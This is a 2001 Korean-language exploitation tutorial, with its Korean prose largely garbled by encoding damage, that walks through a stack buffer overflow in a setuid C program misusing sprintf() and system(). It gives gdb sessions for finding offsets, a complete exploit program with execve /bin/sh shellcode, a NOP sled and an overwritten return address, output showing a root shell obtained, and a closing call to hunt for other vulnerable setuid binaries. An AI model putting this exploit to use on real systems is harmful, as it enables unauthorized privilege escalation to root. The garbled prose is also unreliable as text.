=================================================================================== Title : sprintf() 迭 Լ Ͼ Stack Overflow Author : (Xpl017Elz) E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date : f. 2001/3/02 s. 2001 /10/09 =================================================================================== : Overflow attack ϴ ̵ ۵Ǿϴ. , ִٸ szoahc@hotmail.com mail ֽø ϰڽϴ. sprintf() 迭 Լ Ͼ Stack Overflow. #include int sprintf (char *buffer,const chat *format,args); buffer: ڿ Ű . format: Ҷ args: μ sprintf() Լ Լ ƴ ϴ Լν, printf() Լ ϴ. ʱȭ ̷. char values[100]; char exec[500]; ̸ ʰν 츮 ٽ ̵ ְ ȴ. ٽ , sprintf Լ Է ޾ƾ Ұ Ѿν α׷ ߿  ִ°̴. sprintf() Լ ̿ؼ α׷ Ҷ Ʒ Source Ѵ. ڵ sprintf() Լ ̿ؼ α׷Ҷ ִ. Source 캸. #include main(int argc,char *argv[]) { char exec[500]; if (argc < 2) { printf("\nUse: %s IP address",argv[0]); printf("\n ex> %s 127.0.0.1\n\n",argv[0]); exit(0); } sprintf(exec,"ping -c 5 \"%s\"",argv[1]); system(exec); } α׷ CompileϿ ϸ ش. [x82@xpl017elz tmp]$ gcc -o sprintf sprintf.c && ./sprintf Use: ./sprintf IP address ex> ./sprintf 127.0.0.1 [x82@xpl017elz tmp]$ ڸ, IP Է¹޾ ping 5 ִ α׷̴. [x82@xpl017elz tmp]$ ls -la /bin/ping -rwsr-xr-x 1 root root 18228 Feb 11 2000 /bin/ping* [x82@xpl017elz tmp]$ ping -c 5 127.0.0.1 PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.3 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.2 ms ... --- 127.0.0.1 ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.2/0.2/0.3 ms [x82@xpl017elz tmp]$ exit exit [root@xpl017elz tmp]# chmod 755 /bin/ping [root@xpl017elz tmp]# su x82 [x82@xpl017elz tmp]$ ping -c 5 127.0.0.1 ping: socket: [x82@xpl017elz tmp]$ exit exit [root@xpl017elz tmp]# chmod 4755 sprintf [root@xpl017elz tmp]# su x82 [x82@xpl017elz tmp]$ ./sprintf 127.0.0.1 PING 127.0.0.1 (127.0.0.1) from 127.0.0.1 : 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.3 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.1 ms ... --- 127.0.0.1 ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.2/0.3 ms [x82@xpl017elz tmp]$ ls -la sprintf -rwsr-xr-x 1 root root 12103 Oct 10 19:21 sprintf* [x82@xpl017elz tmp]$ /bin/ping α׷ ⺻ setuid Ǿ ִ. Ϲ socket Ҽ ε, Ȼ ߰ߵǾ ping α׷ κ Server setuid صд. α׷ setuid صдٸ, Ȼ (?) Ϲ α׷ ̿Ͽ ping test Ҽ̴. test ϱ Server ο ġص , Ϲ Ҽ ־. , α׷ ϰ ִٴ° 츮 ˰ִ. sprintf() Լ ϰ ֱ , ̸ ̿ؼ ̵  ~ :-p test̴. [x82@xpl017elz tmp]$ ./sprintf `perl -e "print 'x'x500"` ping: unknown host xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Segmentation fault [x82@xpl017elz tmp]$ , α׷ Source sprintf() Լ 500 ̳ ڿ Է¹ ֵ Ǿִ. (char exec[500];) exploit ѵ . perl ̿Ͽ shellcode address , 츮 c ̿ exploit غ ϰڴ. [x82@xpl017elz tmp]$ cp sprintf x0x [x82@xpl017elz tmp]$ gdb x0x ... (gdb) break main Breakpoint 1 at 0x8048479 (gdb) r Starting program: /var/tmp/x0x Breakpoint 1, 0x8048479 in main () (gdb) x/40 $ebp 0xbffffa18: 0xbffffa38 0x400311fb 0x00000001 0xbffffa64 0xbffffa28: 0xbffffa6c 0x40012024 0x00000001 0x080483c0 0xbffffa38: 0x00000000 0x080483e1 0x08048470 0x00000001 0xbffffa48: 0xbffffa64 0x08048308 0x0804850c 0x4000a600 0xbffffa58: 0xbffffa5c 0x40012670 0x00000001 0xbffffb5b 0xbffffa68: 0x00000000 0xbffffb68 0xbffffb82 0xbffffca1 0xbffffa78: 0xbffffcaf 0xbffffcbd 0xbffffcd4 0xbffffce0 0xbffffa88: 0xbffffcf2 0xbffffd0c 0xbffffd17 0xbffffd25 0xbffffa98: 0xbffffd83 0xbffffd8f 0xbffffd9e 0xbffffdb3 0xbffffaa8: 0xbffffdc3 0xbffffdcc 0xbffffddb 0xbffffdee (gdb) Stack ̴. ˼ֵ $ebp address 4byte address, return address δ. (0x400311fb) ִ address 0xbffffa1c̴. κ ٷ shellcode addressθ ϸ, Game ȴ. :-) ٽѹ, Ȯ test ģ. (gdb) disass main Dump of assembler code for function main: 0x8048470
: push %ebp 0x8048471 : mov %esp,%ebp 0x8048473 : sub $0x1f4,%esp 0x8048479 : cmpl $0x1,0x8(%ebp) 0x804847d : jg 0x80484b0 0x804847f : mov 0xc(%ebp),%eax 0x8048482 : mov (%eax),%edx 0x8048484 : push %edx 0x8048485 : push $0x8048530 0x804848a : call 0x8048388 0x804848f : add $0x8,%esp 0x8048492 : mov 0xc(%ebp),%eax 0x8048495 : mov (%eax),%edx 0x8048497 : push %edx 0x8048498 : push $0x8048544 0x804849d : call 0x8048388 0x80484a2 : add $0x8,%esp 0x80484a5 : push $0x0 0x80484a7 : call 0x8048398 0x80484ac : add $0x4,%esp 0x80484af : nop 0x80484b0 : mov 0xc(%ebp),%eax ---Type to continue, or q to quit--- 0x80484b3 : add $0x4,%eax 0x80484b6 : mov (%eax),%edx 0x80484b8 : push %edx 0x80484b9 : push $0x8048559 0x80484be : lea 0xfffffe0c(%ebp),%eax 0x80484c4 : push %eax 0x80484c5 : call 0x80483a8 0x80484ca : add $0xc,%esp 0x80484cd : lea 0xfffffe0c(%ebp),%eax 0x80484d3 : push %eax 0x80484d4 : call 0x8048358 0x80484d9 : add $0x4,%esp 0x80484dc : leave 0x80484dd : ret 0x80484de : nop 0x80484df : nop End of assembler dump. (gdb) break *0x80484dd Breakpoint 1 at 0x80484dd (gdb) r `perl -e "print 'x'x492"` Starting program: /var/tmp/x0x `perl -e "print 'x'x492"` ping: socket: Breakpoint 1, 0x80484dd in main () (gdb) info reg eax 0x100 256 ecx 0xbffff374 -1073745036 edx 0x0 0 ebx 0x40107bec 1074822124 esp 0xbffff81c -1073743844 ebp 0x22787878 578320504 esi 0x4000a600 1073784320 edi 0xbffff864 -1073743772 eip 0x80484dd 134513885 eflags 0x286 646 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x4004c4e4 1074054372 fcs 0x77d0023 125632547 fopo 0xbffff938 -1073743560 fos 0xffff002b -65493 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x4003110e in __libc_start_main (main=Cannot access memory at address 0x22787880 ) at ../sysdeps/generic/libc-start.c:41 41 ../sysdeps/generic/libc-start.c: ׷ ̳ 丮 . (gdb) c Continuing. Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) ˼ֵ "ping -c 5 " 10byte ϸ buffer  ִ° 491byte ȴ. ׷Ƿ, 492 ڿ Էϸ, Return address 0x40031100 Ǿ Ḧ Ű Ǵ°̴. (gdb) x/10 $ebp 0x22787878: Cannot access memory at address 0x22787878 Overwrite ebp 0x22787878̴. OverwriteǴ ڿ xxxx...xxxx 492 ϰ [Ctrl-V SYN](0x22), [NULL](0x00) ʴ ־. 4byte(0x00000022) ̱ ڿ 492 Segmentation fault Ͼ°̴. ׷, exploit ۾  . ebp Overwrite Ų address غ ebp address 0xbffff818 Ȱ ˼־. shellcode Էµ κ address ߴ ̴. ̴ ſ ̴. ebp 0xbffff818 ˾ 450byte(1c2) Žö κ address ϸ, shellcode ִ ġ Ҽ ִ. , NOPcode(0x90) ؾ Ұ̴. (0xbffff818 - 0xbffff1c2 = 0xbffff656) shellcode address 0xbffff656 ̶ ˾. Overwrite exploit . NOP = 250byte shellcode = 24byte etcvalues = 219byte : 493byte Overwrite [x82@xpl017elz tmp]$ cat expl.c #include char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; main() { int a_xox, b_xox, c_xox; char x_xox[1500]; bzero (&x_xox, 1500); for (a_xox = 0;a_xox <= (274-sizeof(shellcode));a_xox++) { x_xox[a_xox] = 0x90; /* NOP */ } for (b_xox = 0, a_xox = a_xox;b_xox < (sizeof(shellcode)-1);a_xox++,b_xox++) { x_xox[a_xox] = shellcode[b_xox]; /* shellcode */ } for (c_xox = 0;c_xox <= 218;c_xox++) { x_xox[a_xox++] = 0x20; /* etcvalues */ } // Return Address // x_xox[a_xox++] = 0x56; /* Ͽ */ x_xox[a_xox++] = 0xf6; x_xox[a_xox++] = 0xff; x_xox[a_xox++] = 0xbf; execl("./sprintf","sprintf",x_xox,NULL); perror("\n"); exit(0); } [x82@xpl017elz tmp]$ gcc -o expl expl.c [x82@xpl017elz tmp]$ ./expl ping: unknown host B? V bash# Oops~! :-) ̴. ϰ ѹ shell .  캸 . 0xbffff624 70 69 6e 67 20 2d 63 20 35 20 22 // (ping -c 5 ") 90 90 90 90 90 ping -c 5 "..... 0xbffff634 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff644 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff654 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ ~~ 0xbffff656 (Return address Ų κ) 0xbffff664 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff674 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff684 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff694 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6a4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6b4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6c4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6d4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6e4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff6f4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff704 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff714 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffff724 90 90 90 90 90 // NOP κ 31 d2 52 68 6e 2f 73 68 68 2f 2f .....1.Rhn/shh// 0xbffff734 62 69 89 e3 52 53 89 e1 8d 42 0b cd 80 // shellcode κ 20 20 20 bi..RS...B... 0xbffff744 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff754 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff764 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff774 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff784 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff794 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7a4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7b4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7c4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7d4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7e4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff7f4 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff804 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffff814 20 20 20 20 20 20 20 20 // etcvalues κ 56 f6 ff bf // shellcode ּ ( Return address) 22 00 00 00 v..."... // 0x00000022 κ 0xbffff824 04 f8 ff bf 10 f8 ff bf 24 20 01 40 02 00 00 00 ........$ .@.... 0xbffff834 f0 83 04 08 00 00 00 00 11 84 04 08 84 86 04 08 ................ 0xbffff844 02 00 00 00 04 f8 ff bf 2c 83 04 08 3c 87 04 08 ........,...<... 0xbffff854 00 a6 00 40 fc f7 ff bf 70 26 01 40 02 00 00 00 ...@....p&.@.... 0xbffff864 19 f9 ff bf 1c f9 ff bf 00 00 00 00 0e fb ff bf ................ 0xbffff874 28 fb ff bf 47 fc ff bf (...G... ̷ν shellcode  캸Ҵ. scanf() Լ Ҷʹ ޸ code Էºκп 鹮ڿ ʱ , Ͱ exploit Ͽ. е sprintf() Լ ϴ α׷ ãƳ exploit غ ٶ. bash# strings /bin/* | grep sprintf | more sprintf sprintf sprintf vsprintf sprintf vsprintf sprintf sprintf sprintf ... sprintf sprintf sprintf sprintf vsprintf sprintf sprintf vsprintf sprintf sprintf bash# , setuid ɸ α׷ ƴϴ exploit ۾ shell ° ϹǷ,  ȯ濡 ϴ. :-p , ûϰ ¥ α׷ ã ϴ :-(